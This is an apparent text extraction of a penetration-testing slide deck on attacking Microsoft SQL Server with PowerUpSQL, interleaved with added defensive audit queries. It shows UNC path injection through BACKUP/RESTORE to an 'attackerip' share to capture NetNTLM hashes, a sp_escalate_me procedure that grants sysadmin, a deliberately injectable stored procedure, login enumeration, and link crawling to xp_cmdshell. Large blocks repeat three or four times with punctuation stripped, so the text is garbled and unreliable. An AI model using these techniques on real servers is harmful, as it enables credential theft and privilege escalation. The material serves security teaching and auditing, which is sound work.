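        ELSE N'LOW: fixed remote login for a single local login'
    END                                      AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
    ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY finding, s.name;
```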
Escalating Privileges: UNC Path Injection

• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'

Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008

So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
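Where the patch is not available, the remaining option is to see the attempts. The following is an added example (not from the deck or from PowerUpSQL): a SQL Server Audit that records every BACKUP and RESTORE statement, and a query that pulls out the ones aimed at a UNC path by a login that is not a sysadmin. Audit names and the file path are placeholders.

```sql
-- Added example, not from the original deck. Names and paths are placeholders.
USE master;
GO
CREATE SERVER AUDIT Audit_BackupRestore
    TO FILE (FILEPATH = N'C:\SQLAudit\')   -- placeholder; must be writable by the service account
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
CREATE SERVER AUDIT SPECIFICATION AuditSpec_BackupRestore
    FOR SERVER AUDIT Audit_BackupRestore
    ADD (BACKUP_RESTORE_GROUP)              -- fires for BACKUP and RESTORE in any database
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT Audit_BackupRestore WITH (STATE = ON);
GO
-- Review: a sysadmin backing up to a file share is routine; a login that holds
-- only public pointing BACKUP or RESTORE at a \\host\share path is the pattern
-- from the slide above and deserves a look.
SELECT  a.event_time,
        a.server_principal_name,
        a.database_name,
        a.succeeded,
        a.statement
FROM    sys.fn_get_audit_file(N'C:\SQLAudit\*.sqlaudit', DEFAULT, DEFAULT) AS a
WHERE   a.statement LIKE N'%DISK%=%\\%'     -- two literal backslashes: a UNC target
  AND   ISNULL(IS_SRVROLEMEMBER(N'sysadmin', a.server_principal_name), 0) = 0
ORDER BY a.event_time DESC;
```

Failed statements are worth keeping in the result: the outbound SMB connection, and therefore the NetNTLM exchange, happens before SQL Server reports that the file could not be written.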
Escalating Privileges: DEMO
Get-SQLServiceAccountPwHashes
…what? It's self-descriptive.
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode      x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach                                                     | Common Tools
Access as Local Administrator                                | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                        | Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process  | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process   | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                             | DBATools
Common Post Exploitation Activities

Post Exploitation Overview

1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
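A hunt for the SQL Server layer persistence spots named above (startup procedures, Agent jobs, server- and database-level triggers), added here as an example and not taken from the deck or from PowerUpSQL. It assumes sysadmin rights and is meant to be run in master, with the database-trigger part repeated in each user database.

```sql
-- Added example, not from the original deck. Every hit should be checked against
-- change records; all four object kinds have legitimate uses.
-- Startup procedures: run automatically under the service account at every start.
SELECT  'startup procedure'                        AS kind,
        SCHEMA_NAME(p.schema_id) + '.' + p.name    AS name,
        p.modify_date,
        OBJECT_DEFINITION(p.object_id)             AS definition
FROM    master.sys.procedures AS p
WHERE   OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1
UNION ALL
-- Server-level triggers: DDL triggers fire on every server DDL event,
-- logon triggers on every login (a classic place to hide a privilege grant).
SELECT  'server trigger (' + t.type_desc + ')',
        t.name,
        t.modify_date,
        OBJECT_DEFINITION(t.object_id)
FROM    sys.server_triggers AS t
UNION ALL
-- Database-scoped DDL triggers in the current database (parent_class 0 = database,
-- which excludes ordinary table triggers).
SELECT  'database trigger',
        t.name,
        t.modify_date,
        OBJECT_DEFINITION(t.object_id)
FROM    sys.triggers AS t
WHERE   t.parent_class = 0
UNION ALL
-- Agent job steps that run T-SQL, an OS command or PowerShell. The job owner and
-- any proxy account decide the context the step runs in; both are worth a look.
SELECT  'agent job step (' + js.subsystem + ')',
        j.name + ' / ' + js.step_name,
        j.date_modified,
        js.command
FROM    msdb.dbo.sysjobs AS j
JOIN    msdb.dbo.sysjobsteps AS js
    ON  js.job_id = j.job_id
WHERE   js.subsystem IN ('TSQL', 'CmdExec', 'PowerShell')
ORDER BY modify_date DESC;
```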
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation. Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation. Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
GO

SYSADMIN is often the OWNER
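An audit query for the condition just described (a TRUSTWORTHY database owned by a sysadmin, containing modules that run WITH EXECUTE AS OWNER), added here as an example; it is not part of the original slides or of PowerUpSQL. It assumes nothing beyond the system catalog and is meant to be run by a sysadmin.

```sql
-- Added example (not from the original slides): find databases where a
-- db_owner could reach sysadmin through EXECUTE AS OWNER, then list the
-- modules in them that are declared WITH EXECUTE AS OWNER. Run as sysadmin.
SET NOCOUNT ON;

-- Part 1: TRUSTWORTHY databases and whether their owner is a sysadmin.
SELECT d.name                                              AS database_name,
       SUSER_SNAME(d.owner_sid)                            AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin,
       d.is_trustworthy_on
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> N'msdb'                 -- msdb is TRUSTWORTHY by design
  AND d.state_desc = N'ONLINE'
ORDER BY owner_is_sysadmin DESC, d.name;

-- Part 2: modules with EXECUTE AS OWNER inside those databases.
-- sys.sql_modules.execute_as_principal_id is -2 for OWNER, NULL for CALLER,
-- and a user's principal_id for EXECUTE AS 'user'.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql += N' UNION ALL SELECT ' + QUOTENAME(d.name, '''') + N' AS database_name, '
             + N's.name + N''.'' + o.name AS module_name, o.type_desc '
             + N'FROM ' + QUOTENAME(d.name) + N'.sys.sql_modules AS m '
             + N'JOIN ' + QUOTENAME(d.name) + N'.sys.objects AS o ON o.object_id = m.object_id '
             + N'JOIN ' + QUOTENAME(d.name) + N'.sys.schemas AS s ON s.schema_id = o.schema_id '
             + N'WHERE m.execute_as_principal_id = -2'
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> N'msdb'
  AND d.state_desc = N'ONLINE';

IF @sql <> N''
BEGIN
    -- Strip the leading separator (DATALENGTH/2 = character count, unlike LEN,
    -- which ignores trailing spaces).
    SET @sql = STUFF(@sql, 1, DATALENGTH(N' UNION ALL ') / 2, N'') + N' ORDER BY 1, 2;';
    EXEC sp_executesql @sql;
END;

-- Remediation for a hit (fill in names from the output):
--   ALTER DATABASE [<db>] SET TRUSTWORTHY OFF;
--   ALTER AUTHORIZATION ON DATABASE::[<db>] TO [<low-privilege login>];
-- Procedures that genuinely need elevated rights should be certificate
-- signed instead (the "Use signed procedures" option on the following slides).
```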
Escalating Privileges: Impersonation. Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
